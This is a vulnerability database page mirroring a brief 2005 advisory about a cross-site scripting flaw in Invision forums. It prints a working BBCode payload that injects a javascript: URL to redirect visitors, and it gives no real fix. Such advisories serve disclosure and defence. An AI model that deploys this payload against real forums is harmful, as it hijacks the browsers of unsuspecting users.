Lucene search

invision131xss.txt

🗓️ 25 Feb 2005 00:00:00Reported by Daniel A.Type

packetstorm🔗 packetstormsecurity.com👁 13 Views

Lack of SML code validation leads to Cross-Site Scripting vulnerability in Invision forums.

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`  
  
Description:  
Lack of checking in the SML codes.  
Exploit:  
Put this into any signature or post on an invision forum:  
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascript:document.location.replace('http://www.hackthissite.org');") [/color]  
Fix:  
I'm not good at regexes :)  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

25 Feb 2005 00:00Current

7.4High risk

Vulners AI Score7.4